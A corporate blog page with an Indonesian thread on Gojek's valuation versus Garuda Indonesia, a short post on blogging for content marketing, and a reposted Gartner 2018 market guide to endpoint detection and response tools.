Translate

Sunday, December 30, 2018

Adaptive Circular Cities

Social Engineering Tactics

Kenapa valuasi Gojek, 10 kali lipat lbh tinggi daripada Garuda Indonesia?

*GO-JEK...Dahsyat !!!*

Kenapa valuasi Gojek, 10 kali lipat lbh tinggi daripada Garuda Indonesia?

Pdhl aset Gojek HANYA aplikasi, smntra Garuda Indonesia punya aset puluhan Boeing....

Apakah ini model valuasi yg absurd, ataukah the magic of digital economy.

Mari kita ulas filosifinya dng renyah. https://www.tagar.id/tag/gojek

THREAD
Valuasi artinya harga jual sebuah perusahaan di mata investornya. 

Model valuasi konvensional mengukur harga perusahaan dari kemampuannya hasilkan laba. Juga dari total aset yg dimiliki dikurangi total hutang.
Valuasi Garuda Indonesia saat ini hanya Rp 6 triliun, jauh dibawah valuasi Gojek yg sdh 75 triliun. 

Valuasi Garuda buruk krn mrka punya utang Rp 40 triliun, angka utang yg masif. Tahun lalu mrka juga rugi Rp 2.7 triliun.
Valuasi Garuda Indonesia buruk jg krn beban biaya operasional mrka tinggi plus beban bayar bunga hutang yg segede gaban. 

Kalau utangnya 40 triliun, asumsi bunga hutang 10%/tahun maka Garuda butuh dana 4 triliun cash per tahun hanya buat bayar bunganya. 

Scary.
Jaman dulu, valuasi bisnis lbh fokus pd tangible asset atau aset fisik macam pabrik, tanah, bangunan, dan aset fisik lainnya. 

Jaman now, intangible asset atau aset ghoib diangggap lbh utama. 

Contoh intangible asset : 

Brand image
Hak paten
Human capital
Apps
Digital platform
Aset FB atau Google hnyalah aplikasi dan digital platform (plus server farm). 

Aset Toyota atau Boeing adalah ratusan pabrik seluas puluhan kali lapangan sepakbola. 

Tp valuasi Facebook atau Google yg tembus Rp 8000 triliun puluhan kali lipat diatas valuasi Toyota atau Boeing.
Di era digital economy, kekuatan value sebuah app bisa sangat masif.

Instagram HANYALAH SEBUAH APLIKASI. 

Iya IG itu cuman app. Bukan rocket science technology. 

Berapa valuasi IG hari ini? 

Rp 1.000 triliun.
Knp sebuah aplikasi yg so simpel harganya bisa ribuan triliun?

Jawabannya: sebab di era internet ini, sebuah app bisa jangkau miliaran user dlm detik yg sama. 

Itulah Scalability Power. The Power of App Economy. 

Dengan koneksi internet, ratusan juta user bs ditangkap dg seketika.
Filosofi digital spt diataslah yg jg menjelaskan knp valuasi Gojek/Gopay saat ini sdh tembus Rp 75 triliun. 

Gojek/Gopay hanyalah aplikasi. Mrka sama sekali tak punya aset fisik yg masif. 

Kekayaan mrka hanyalah intangible asset berupa aplikasi bersahaja bernama Gojek/Gopay.
Aplikasi Gojek/Gopay dihargai mahal krn dg internet, aplikasi itu bs jangkau jutaan pelanggan dg seketika. Nyaris tanpa beban biaya sama sekali. Kenapa almost zero cost. 

Krn nangkap pelanggannya dg digital connection. Bukan spt bank yg hrs pnya ribuan kantor cabang yg amat mahal.

Hanya dg digital connection, saat ini Gopay sdh bisa raih sekitar 30 juta pelanggan. Tanpa bantuan 1 pun kantor cabang.

Dan dg kekuatan digital, user Gopay yg 30 jt itu dg mudah bisa di-scale menjadi 100 jt. 

Juga tanpa bantuan satupun bangunan fisik atau ribuan pegawai teller.

Dg kekuatan digital, jumlah pengguna Gopay bisa di-scale dg masif, dan hampir tanpa additional cost yg signifikan. Branchless operation. 

Nah para investor optimis pengguna Gopay bisa tembus 100 juta dalam 3 tahun ke depan.
Bayangkan apa yg akan terjadi jika pengguna Gopay sdh tembus 100 juta? 

Sederhana: harga saham BCA dan Bank Mandiri bisa terpelanting dlm duka yang amat perih.

Revolusi bank akan terjadi.

Dan valuasi Gojek bisa makin naik menuju 200 triliun, dari angka 75 T saat ini. Optimisme akan prospek pertumbuhan masa depan bisnis. Inilah jg salah satu kunci untk melakukan valuasi bisnis. 

Valuasi Gojek/Gopay dihargai amat mahal sebab investor yakin akan masa depan mereka.

Investor optimis Gopay bisa tembus hingga 100 juta pelanggan. Jadi valuasi Gojek yg saat ini tembus Rp 75 triliun terjadi krn faktor:

1. The power of digital app. Aplikasi mrka bisa raih puluhan juta pelanggan dg super efisien. 

2. Optimise investor bahwa kelak Gopay akan kuasai digital payment di tanah air.

Fanky Christian
Director
PT Daya Cipta Mandiri Solusi
DataCenter-Cloud-Monitoring
Mobile/WA: +628121057533
Wechat/Skype: fankych1211
www.dayaciptamandiri.com

Saturday, December 29, 2018

5 Alasan mengapa blogging tetap yang terbaik untuk Content Marketing

Regardless of the rise in new Content formats and features, your blog stays integral to effective Content Marketing. It is commonly the interactive hub of your website and conveys various advantages you can't accomplish through different tools.
Blogging is the most essential part of content marketing with regards to producing organic traffic.
The following is a look at primary reason a blog is critical to lead generation through Content Marketing.
  • Individuals Want Answers and Advice 
The dominant part of people with an issue swing to the web looking for data or an answer. Your blog is a critical place to offer data and answers during initial awareness and consideration stages in a purchaser's investigation.
Your blog is likewise the best place to convey guidance to individuals confronting issues that your organization addresses.
  • You Can Drive Conversions 
If your data is valid and answers the query of the buyer, it sets up a call-to-action for a solution. Some Blogs with accurate sites, in-depth information exhibit credibility and authority on a given topic. Your blog content aides the buyer through the disclosure period of issue determination. Around the finish of your post, a first rate suggestion to take action indicates the peruser the following stage of the excursion.
Depending upon the circumstance, the CTA could drive downloads of additional in-depth whitepapers or case studies, or interface with landing page where you give specific solutions.
  • Google Loves Freshness
Fresh content is a critical point Google’s search engine results placement (SERP) calculation. Since your main website pages are typically static, a business blog is the best technique to post new content reliably and consistently.
Composing a few new blog articles every week offers Google, and other search engines, new, important content to scan when they crawl your webpage. A different range of topics additionally extends your reach in user searches.
  • Insight into Your Audience
Blogging likewise encourages you build up your Detective skills in two critical ways. To begin with, coming up with topics for a regular blog influences the need to think like your intended interest group thinks. When composing a decent business blog, you are continually asking yourself what the reader needs to know, how to best give that learning, and how to move the reader to make a action.
Besides, catching analytics for your blog reveals much about the way your website visitors think and feel. Blog analytics enable you to make sense of what topics are most popular among your readers, which content they share Social media, and even what time of day they read your content. The more you think about your leads, the more engaged you are to sustain them and get them completely through the sales funnel.


  • Blogs are Inexpensive 
Contrasted with conventional media advertising, blogs are very inexpensive to operate.
You as of now put resources into the technology infrastructure, for example, servers and programming, so it is just a limited additional investment in that area.
The allotment of individuals or contract expenses to content creation is moderate. Additionally, the content can live indefinitely on your site, taking into account an extended life span.

Dampak Infografis pada sosial media marketing

Friday, December 28, 2018

Market Guide untuk solusi Endpoint Detection & Response

Market Guide for Endpoint Detection and Response Solutions

Published 26 November 2018 - ID G00346131 - 23 min read

Security and risk management leaders need endpoint detection and response tools to enable their security operations teams to discover more evasive threats and efficiently resolve security alerts. The EDR market is rapidly converging with the endpoint protection platform market.

Overview

Key Findings

  • Endpoint detection and response (EDR) is crucial for advanced endpoint protection solutions capable of detecting suspicious behaviors at all levels of the computing stack from the device to the user.
  • While EDR tools can be difficult to use for less experienced operators, they can improve overall security efficiency by reducing the time to detect and respond to security incidents.
  • EDR tools are reaching feature maturity; however, automation and orchestration capability, global contextual incident enrichment, proactive hardening, root cause analysis, and managed service offerings remain differentiators.
  • Established endpoint protection platform (EPP) vendors are rapidly filling in their EDR capabilities while dedicated EDR vendors are adding better prevention capabilities to compete with and displace incumbent EPP vendors. However, vendors that specialize in EDR still have better EDR capabilities.
  • There are over 30 vendors offering credible EDR products; however, the top nine vendors have 83% of the market share. Mergers and acquisitions will continue in 2019.

Recommendations

Security and risk management leaders handling endpoint security should:
  • For mature security organizations: Invest in EDR capabilities that emphasize workflow, orchestration, automation and integration to fully incorporate EDR into existing incident response processes and tools.
  • For less mature security organizations: Invest in EDR solutions, but favor solutions that are fully integrated with endpoint protection, and offer cloud-based management and detection logic. Invest in advanced support for incident response help, or outsource to a managed detection and response solution provider.

Strategic Planning Assumptions

By 2025, 70% of organizations with more than 5,000 seats will have endpoint detection and response (EDR) capabilities, up from 20% today.
By 2022, 60% of organizations that leverage endpoint detection and response (EDR) capabilities will use the endpoint protection solution from the same vendor or managed detection and response services.

Market Definition

This document was revised on 6 December and 28 November 2018. The document you are viewing is the corrected version. For more information, see the  Corrections page on gartner.com.
The EDR market is defined as solutions that record and store endpoint-system-level behaviors, use various data analytics techniques to detect suspicious system behavior, provide contextual information, block malicious activity, and provide remediation suggestions to restore affected systems.
EDR solutions must provide the following four primary capabilities:
  • Detect security incidents
  • Contain the incident at the endpoint
  • Investigate security incidents
  • Provide remediation guidance
Essentially, EDR vendors provide tools that enable the bottom half of the adaptive security architecture (see Figure 1).
Figure 1. The Adaptive Security Architecture
Source: Gartner (November 2018)
The Adaptive Security Architecture

Market Description

EDR is a foundational security capability. Gartner expects nearly all endpoint and server protection solutions to include EDR capability eventually. To be effective, EDR solutions require a cloud-scale data management and analytics capability combined with a steady feed of intelligence about changing attacker tradecraft. Endpoint security vendors must develop a core competency in these fields or face disruption.
Good EDR solutions allow incident responders to rapidly answer the most common questions when systems are breached:
  1. What is the extent of the breach?
  2. How did the breach happen?
  3. What did the hacker or malware do while it was active?
  4. How do we restore the system with confidence that all traces are destroyed?
  5. Is this a random attack, or are we a target, and if so what are the attacker’s goals?
  6. How do we prevent it from happening again?

Market Direction

Gartner estimates that the EDR market will surpass $1 billion in 2018, up more than 50% from our 2017 estimate due to rapid growth of installed seats and increased average revenue per unit (ARPU) as a result of EDR vendors selling more prevention. We predict 25% growth in 2019. Meanwhile, we are tracking more than 30 vendors with EDR capability; however, in our estimation, the top nine EDR vendors have more than 83% of the total market share by seat licenses (Carbon Black, Cisco, CrowdStrike, Cybereason, FireEye, McAfee, Microsoft, Symantec and Tanium).
We estimate the market is now roughly 20% penetrated (i.e., 20% of enterprise endpoints have EDR agents). Approximately 40% of EDR deployments are using both EDR and EPP from the same vendor. Longer term, as EDR becomes a standard feature of EPP, breaking out revenue attributable to this market will become more difficult.

Market Analysis

Most security buyers are looking for platform-based solutions that provide all aspects of the adaptive security architecture (see Figure 1). Dedicated EDR solution providers are moving rapidly counterclockwise from the respond and detect quadrants to the prevent quadrant, whereas more traditional endpoint protection platform (EPP) vendors (see “Magic Quadrant for Endpoint Protection Platforms”) are moving clockwise into detect and respond. The stand-alone EDR market will remain viable until at least 2022 for the dedicated security operations center (SOC) team. But the rapid proliferation of EDR capability into EPP solutions will satisfy the midmarket and below (see Note 2). We anticipate that the stand-alone EDR vendors will focus on adopting more features commonly found in the security orchestration, automation and response (SOAR) market (see “Innovation Insight for Security Orchestration, Automation and Response”), shift into other security markets, or be acquired.

Market Trends in 2019

Buyer acceptance of multitenant SaaS EDR solutions is rapidly increasing. Indeed, the benefits of low-friction adoption, cloud storage and computing scale, and low solution maintenance are disruptive to traditional solutions. Architecture is also shifting from smart disconnected client agents to more adaptable lightweight data collection and enforcement agents powered by always-available cloud intelligence. It is mostly the new vendors in this market that are capitalizing on cloud computing to deliver more agile solutions with lower maintenance overhead. Centralized cloud data also provides superior detection analytics enabled by consolidated real-time data collection and the ability to use the data for refining machine learning and other detection techniques, and the luxury of using multiple detection engines simultaneously.
While the EPP solutions have been using a cloud assist signature look-up model, they have not replaced the large dependence on distributed signatures, nor have they taken advantage of cloud detection logic in real time. Several of the newer solutions in the market are now using a cloud-stored signature database and detection engines which have several advantages over distributed signatures. The cloud provides the most up-to-date data on new threats. It can hold larger sets of data, including both the good and bad application signatures; it eliminates the maintenance issues of daily signature distribution; it enables a lighter agent; and it reduces network congestion. Off-network machines may be at more risk in this architecture; however, this is offset by nonsignature client-side detection methods and the design of threats, which mostly depend on the internet to achieve their aims.
Acceptance of cloud data storage and management is increasing, but is not universal. Some vertical markets (e.g., defense) and geographic regions are still wary of cloud delivery. Privacy and regulatory compliance concerns are still common. More critically, most EDR clouds are run from only one or two data centers. Prospective cloud buyers often have valid geopolitical, legal, and availability or latency concerns. Moreover, buyers have a hard time assessing the security of the providers’ cloud environments. Cloud EDR providers will be forced to provide more public and private cloud deployments, and meet industry certifications such as the Federal Risk and Authorization Management Program (FedRAMP) to address these concerns.
EDR solutions are designed to detect and surface suspicious events for inspection. Resolving these less deterministic alerts may increase the workload and require more sophisticated operators than traditional EPP tools require. However, increased visibility from EDR tools also improves existing incident responses and remediation efforts. To help alleviate the skills gap, many EDR solution providers are offering a range of managed support options. Less mature organizations are strongly encouraged to buy support for incident response or fully managed solutions (managed detection and response).
In addition to traditional techniques such as signatures, static file analysis and behavioral analysis, numerous vendors are advertising machine learning (ML) capabilities (or the more hyped “artificial intelligence”) to differentiate their detection methods. There is no question that using ML to detect events in the mountains of data collected is a critical task, and ML will have future uses as EDR solutions expand into user and entity behavior analytics (UEBA)-type detections. However, buyers should beware the hype and focus on measured outcomes. ML is a valuable tool, but it is not the only technique that has value.
Leading improvements in functionality during 2018 included:
  • Addition of deception decoys and breadcrumbs for improved detection
  • Addition of vulnerability assessment
  • Utilization of the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework to classify and consolidate alerts
  • Increased automation of common incident response (IR) tasks and remediation actions
  • Improved search functions for hunting and IR actions
  • Improvements in detection of malicious scripts (particularly PowerShell) and other Microsoft utility exploit techniques
  • Usability improvements aimed at improving SOC operator productivity and lowering the prerequisite knowledge for administrators responding to alerts
  • Improved response actions such as fetching memory and files, and remote access to execute scripts and commands
  • Improvements in linking chained attack stages together into a single event graph
  • Increase in network detection techniques
  • Integration across network products such as cloud access security broker (CASB), firewall, network traffic analysis tools, secure email and web gateways
Many vendors are also advertising improvements in threat-hunting capability. However, in most cases, vendors are referencing improved search capability or automated threat intelligence service integration. Few organizations have the skills for real threat “hunting,” which is defined as searching for unknown threat indicators.

Longer-Term Trends

As the EDR market matures, Gartner expects feature improvements to focus on increasing the capabilities of the adaptive security architecture (see Figure 1) to provide more holistic and integrated security capabilities. These will include community intelligence-sharing portals and global comparative trending data that can improve “predict” capabilities. Proactive security state assessments provide configuration information to spot security problems before they become a breach. Hardening techniques, such as flexible whitelisting, will become more common to prevent malware execution. Hardening policy will provide execution restriction to limit process access to OS services (i.e., no autoexecute from USB, as well as no external network access, proxy or restrictions to OS services) to prevent malware from gaining a foothold.
Data stored from the EDR solutions can also be used to detect potential issues, such as insider threat and account takeover, that are currently addressed by UEBA (see “Market Guide for User and Entity Behavior Analytics”). However, few EDR vendors are addressing this market yet.
EDR vendors have not yet focused on the unique demands of cloud workload protection (see “Market Guide for Cloud Workload Protection Platforms”). Most of the focus of EDR has been on end-user-facing endpoints and on-premises Windows and Linux servers; however, the providers are only beginning to address elastic virtual and container workloads in infrastructure as a service (IaaS) environments.
Attackers are becoming more aware of EDR solutions, and are starting to develop countermeasures such as disabling EDR agents. User space agents are most at risk of compromise by attackers. Memory and kernel space attacks are increasingly common, and we anticipate that attackers will move lower in the stack into hardware and firmware, which may be less visible with current EDR techniques.
Microsoft Windows 10 Defender Advanced Threat Protection (ATP) could be influential in this market. Windows 10 deployments are proceeding rapidly at many organizations. The embedded ATP capability eliminates the need to deploy and manage additional agents. Integration in the OS can provide better visibility control and tamper protection. Microsoft ATP agents are available for Windows 7, 8.1 and 10 as well as Server 2012 R2, 2016 and 2019. Microsoft has now partnered with other EDR providers (e.g., Bitdefender, SentinelOne and Ziften) for older Windows platforms, Linux and Mac support. However, ATP does require additional licensing cost (e.g., E5 licenses).

Critical Capabilities for Consideration in Buying Decisions

Infrastructure

Most solutions consist of an endpoint agent data collector and enforcement engine, with a centralized management server, data repository and analytics engine. All are supported by a cloud-based source of indicators of compromise (IOCs) and information on attack patterns. Many include the capability to ingest third-party threat feeds. Some solutions also offer network agents to detect suspicious network traffic patterns.
All solutions support Windows-based endpoints and Windows servers. Support for Mac OS and Linux are now common, but not all functions are the same across all platforms. For example, solutions may provide detection, but not prevention. Support for mobile OSs, mostly Android, is also expanding.

Architectural Considerations

At their core, EDR solutions are based on the efficient collection, storage and mining of vast amounts of data. Therefore, the most significant architectural consideration is where the data is stored — distributed or centrally — and, when stored centrally, whether it’s kept on-premises or in a cloud-based service.
Distributed storage of endpoint logs on the endpoints themselves makes it easier to scale. However, in a global organization, a large number of endpoints will typically be powered down and nonresponsive to queries at any given time. Moreover, local storage of intrusion evidence is more susceptible to attacker manipulation and deletion. Centralizing the storage of endpoint log data is more responsive, and it enables more aggressive and continuous data mining, but it also requires a bigger centralized data repository, which increases cost. Default data retention periods can range from seven to 90 days. Some providers offer methods to store data longer in “cold” storage that needs to be explicitly loaded to search. Some solutions store only “suspect” or interesting data, while others store all data.
Centralizing the data store in a vendor-managed cloud instance service provides ease of implementation, eliminates scalability issues and enables the EDR provider to provide cross-enterprise correlation of events. However, cloud-based storage of EDR data introduces data privacy issues and potential regulatory and geopolitical issues. Solutions are alleviating this concern by providing visibility into the data uploaded to the cloud and data masking for sensitive information.
Some solutions offer temporary agents that can be downloaded for snapshot inspections or introspection queries that run a batch query of Microsoft logs or memory and disk inspection. Periodic state inspection will be useful in digital business partner assessments, incident response and inspecting unmanaged clients for high-trust transactions or data access scenarios. Although useful for unmanaged machines, temporary agents are unable to record what happens between snapshots and, thus, may miss critical short-duration events. Temp agents may also require the use of common credentials with elevated privileges to execute, which can be exploited later on for lateral movement.

Detection

One of the most critical EDR capabilities is the ability to detect sophisticated hidden threats, ideally without requiring externally fed IOCs. The biggest problem for any buyer of EDR solutions is determining the depth and accuracy of detection techniques. There are not yet any standardized public tests of detection capability. Vendors have excellent marketing departments capable of describing even the simplest techniques as if they were invincible ones; however, most organizations will benefit from improvements in detection beyond traditional EPP.
The  MITRE organization has created the ATT&CK knowledge base of adversary tactics and techniques, which can be used to score a vendor’s detection capability across different stages of the attack chain. In the fall of 2018, MITRE conducted ATT&CK-based evaluations of select products. NSS Labs conducts annual tests, and AV-Comparatives is also a good starting point (see “Understand the Relative Importance of AV Testing in EPP Product Selection”).
Future attacks will continue to exploit higher in the stack, including the human layer, and lower in the stack, including firmware-level attacks and attacks on foundational protocols — for example, the Key Reinstallation Attack (KRACK) on the Wi-Fi encryption handshake. PowerShell and Windows utilities exploits are becoming routine. Full in-memory exploits that do not require file-based persistence methods are increasingly common. We also anticipate more attacks against common privileged applications, such as system management tools, and supply chain attacks such as the NotPetya attack (which started from the update of M.E.Doc software) and the CCleaner trojan. Detection methods will also have to address attacks that exploit previously stolen credentials.
The best defensive technique is to deploy a funnel approach to detection that moves from low-cost, but highly deterministic, techniques toward less deterministic techniques aimed at spotting unknown attacks. Solutions should deploy multiple detection approaches (see Note 3); however, the more advanced solutions will focus on behavioral detection at all levels of the stack aimed at spotting common tools, tactics and techniques of advanced adversaries. EDR vendors that also provide incident response services often provide early detection methods of new advanced attacks discovered by their incident response investigations.

Investigation

A security analyst’s ability to investigate EDR and other security alerts to determine the technical- and business-level impacts is a critical capability. Ideal solutions provide a graphic interface that supplies a visual view of events and shows all parent and child events, so that incidents can be traced to their origin and all effects can be shown. Connecting events in a chained attack may be difficult for some solutions. External intelligence — such as related incidents and IOCs, reputation information, and object verdicts from VirusTotal and threat actor information — is useful in scoping the potential impact of an incident. Community information, such as prevalence of objects and actions taken by others, is also valuable. Ideally, solutions will provide enough information that administrators can quickly identify which behaviors triggered alerts and determine the next steps to resolve alerts.
The key is to find solutions that provide guidance sufficient to enable less experienced operators to quickly resolve incidents, but with enough depth to provide sufficient detail for more experienced operators. Solutions are improving automation to take common actions for alerts based on previous actions and integrating with other security solutions to take common actions for remediation. This includes performing related incident searches, submitting objects to a sandbox or VirusTotal for analysis, or isolating machines on the network, blocking process from execution companywide, and coordinating with authentication and network resources to contain damage.
Leading solutions will provide the following features:
  • Fast, real-time, natural language query tools that can get rapid answers to questions about IOC-type objects against the centralized data store or, optionally, against live systems.
  • Risk-prioritized views based on the confidence and severity of the incident, as well as the business value of the assets affected. (Note: “Tagging” devices based on Active Directory, process, machine and network information is a very useful function for dynamically assigning business value.)
  • Click-down attack chain visualization tools that enable investigators to easily pivot on interesting data elements or drill down for more information. (Note: Linking events of seemingly disparate IOCs is extremely important to consolidate alerts and show full attack impact.)
  • Automatable fetching of suspect files or memory and disk dumps.
  • Automatic integrated analysis of suspect processes/files in a cloud or on-premises sandbox, with clearly visible metadata, combined with global information (i.e., categorization, author, prevalence and providence). Not all EDR solutions provide a sandbox, but most have integration with popular third-party solutions.
  • Severity and confidence indicators on threat alerts.
  • Investigation tools that provide an alert management workflow to enable incidents to be assigned, transferred, annotated and easily resolved.

Containment and Remediation

Contextual actions (i.e., actions relevant to the incident) should be available in the administration interface to contain a suspected incident while it is being investigated. The most common option is simply to quarantine a suspected infected endpoint from the rest of the network and isolate its communications to the EDR management console while it is under investigation. Other initial containment options typically include process network isolation, process kill/block, process quarantine and hash-based blocking. Tagging solutions dynamically can provide a way to classify endpoints such that critical systems are not taken offline. Interaction with end users may also be necessary; thus, full directory information with user contact details can be helpful. Leading solutions will provide an instant messaging communications window with the end user.
Although most enterprise organizations reimage machines for all but the most simplistic threats, this approach is expensive and disruptive. Leading EDR solutions should have enough detailed event history information to outline repair actions that will roll back the recorded malicious activity. Leading solutions present operators with a detailed remediation task list and the ability to make changes to the endpoints. Larger organizations are likely to have rigid change control policies and separation of duties between operations and the security teams. As such, EDR tools should be able to transfer the repair tasks list to other operations tools and, ideally, integrate with ticketing systems.
Remediation is the least mature function in the current crop of EDR tools, and most tools focus on simply containing the threat.

Representative Vendors

The vendors listed in this Market Guide do not imply an exhaustive list. This section is intended to provide more understanding of the market and its offerings.

Market Introduction

Vendors that provide EDR capability come from several IT security markets. Dedicated startup vendors focus specifically on EDR capability for enterprise SOC teams. Some of the Visionary EPP vendors in the Magic Quadrant come from the EDR market, but have added prevention to compete in the EPP market. These vendors continue to be distinguished by functional integration of EDR concepts into the solution, versus the bolted-on approach of the EPP vendors that have been developing their own EDR capabilities. Two client management tool (CMT) vendors have added EDR capability. Network security vendors are adding EDR capability, mainly via acquisition. Finally, some vendors in the broader security market have acquired or built their own EDR capability.
Table 1 lists 32 representative providers in this market and each provider’s product, service or solution name.

Table 1: Representative Vendors in Endpoint Detection and Response Solutions

Vendor
Product, Service or Solution Name
Binary Defense Vision
GravityZone Ultra Suite
Cb Response, Cb Defense
SandBlast Agent
Advanced Malware Protection for Endpoints
Predictive Endpoint Protection Platform
Falcon Endpoint Protection
Endpoint Detection and Response
Deep Detect & Respond
CylanceOPTICS
Cynet 360
Endpoint Detection and Response
Endgame
enSilo
 ESET
ESET Enterprise Inspector
Fidelis Endpoint
Endpoint Security
Rapid Detection & Response
 Kaspersky Lab (see Note 4)
Endpoint Detection and Response
Endpoint Protection & Response
Active Response
Advanced Threat Protection
Guidance Endpoint Detection and Response
Adaptive Defense
 RSA
NetWitness Endpoint
SentinelOne
Intercept X
Advanced Threat Protection
Threat Response
Apex One
Threat Detection & Response
Zenith
Source: Gartner (November 2018)

Market Recommendations

Before investing in EDR technology, EDR buyers should consider organizational maturity, incident response frequency and security vendor inventory. The key value of EDR solutions is detecting threats that have evaded other protection technologies.
Faster resolution of security alerts and faster incident response are key buying criteria for SOC teams. EDRs can reduce alerts into more consolidated incidents and can be used for malware hunting. However, they require more experienced operators, are yet another agent and console to manage, and can increase false positives.
Organizations with mature security programs and SOCs that would like to improve incident response, reduce alert fatigue and begin hunting should invest in advanced EDR capabilities from dedicated EDR vendors.
Organizations that are maturing, and would like to improve the detection of advanced threats and incident response, will find that most solutions are better than what they are currently using. They should consider ease of use and guided investigations, as well as integration with incumbent security tools, to be critical capabilities.
Low-maturity organizations should invest in vulnerability and configuration management, and other controls before investing in EDR tools. Eventual investments in EDR should be as features of more comprehensive solutions that will improve prevention, as well as detect and respond.
Smaller organizations that are potential victims of advanced attacks, but have few IT resources, should invest in managed security service provider (MSSP) services that offer managed EDR solutions such as managed detection and response (MDR) services.

Note 1Representative Vendor Selection

The vendors listed in this Market Guide have EDR products in the market that meet the market definition and have verifiable customers using the products.

Note 2Capability Matrix

Basic common capability:
  • IOC-based detections
  • Manual hunting
  • Lack of attribution or threat intelligence
  • Limited remediation
  • Hunting = search query
More advanced capability:
  • On-agent detection and prevention
  • Integrated multiengine detection
  • Analytics/machine learning — anomaly detection
  • Behavioral detection — predeveloped and custom
  • Timeline threat graphic views
  • Guided investigations
  • Protection
  • Visual interface
  • Easy pivot
  • Asset tagging
  • Security state assessments
  • Root cause assessments
  • MSSP services
  • Cloud delivery
Advanced capability designed for dedicated SOC buyers:
  • Role-based access control (RBAC)
  • Workflow and case management
  • Community
  • Forensics — memory and disk forensics preservation and analysis
  • Open APIs for both inbound and outbound data sharing
  • Advanced hunting — memory analysis, disk analysis and UEBA-like algorithms
  • Deception
  • Attacker simulation — i.e., attack path
  • On-premises, optional delivery — larger-scale, tens of thousands of seats per server

Note 3Detection Techniques

IOCs and object reputation information provide a low-cost approach, but represent a high volume of information to inspect. IOC information has a short useful life because it is the easiest part of the attack chain for adversaries to automatically change rapidly.
Inspecting portable executable files is the second-most-common technique. File census data (e.g., first seen, first run, certificates and VirusTotal score) should be used to surface suspect files for further analysis. Not all solutions inspect all file types, so ensure that prospect solutions inspect interpreted scripts, such as Java, PowerShell and Perl, and Office document macros. File inspection can be accomplished in several ways:
  • Signatures — Direct hashes of known files, stored in a local cache database or cloud database, are the standard of antivirus vendors. To be effective, signature databases should contain both good and bad files. This is a low-overhead detection method, but its limitations are well-known.
  • Algorithms — Trained machine learning detection methods are gaining in popularity. These solutions do not require the maintenance of a signatures database and are more accurate at detecting variants of known bad files. However, they are potentially subject to gaming the algorithm, and often cause high false-positive detections.
  • Emulated — Some solutions inspect the file code in real time, looking for partial matches to known bad code snippets. It is harder for attackers to change the entire code.
  • Sandboxed — Files are executed in a virtual environment and detected using behavioral detection methods.
Behavioral detection methods offer the highest flexibility and are often hard for attackers to hide with automation. A series of behaviors characterize the tradecraft of the attack type, which is harder to change. Behavioral indicators can be high-level or lower in the stack — for example, at the user process or network level (e.g., late-night admin account login, using nonstandard LAN/application traffic to a new external address). They can also be at the application level (e.g., Word doc spawn “cmd.exe,” starts PowerShell with downloaded pastebin code) or the process level (e.g., process injection or dynamic-link library hijack). Behavioral indicators are often late in the kill chain and, in some cases, may be too late if the attackers can gain control and tamper with protection and detection techniques.

Note 4Kaspersky Lab

In September 2017, the U.S. government ordered all federal agencies to remove Kaspersky Lab’s software from their systems. Several media reports, citing unnamed intelligence sources, made additional claims. Gartner is unaware of any evidence brought forward in this matter. At the same time, Kaspersky’s initial complaints have been dismissed by a U.S. District of Columbia court.
Kaspersky has launched a transparency center in Zurich where trusted stakeholders can inspect and evaluate product internals. Kaspersky has also committed to store and process customer data in Zurich, Switzerland. Gartner clients, especially those who work closely with U.S. federal agencies, should consider this information in their risk analysis and continue to monitor this situation for updates.
source : https://www.gartner.com/doc/reprints?id=1-5Y6HEW5&ct=181214&st=sb&mkt_tok=eyJpIjoiTXpZelpURm1NVFl6WVRNMSIsInQiOiJrR2dCSVpoNXNzaXY3YkU3WGU2cXYwTVdYdldLbExDUENDUEhnTXh1bGhCY0QwcHBpSGNIQmNBVVpiMktyVG83alBSbXBkdmZBdmEwNGJ5Yk1LTGtRVFREaGV6dXlVdXMxMjhxaDBEUjZ2Z1hXcFwvTVN5NFwvUEErSThuT3NJQzF5In0%253D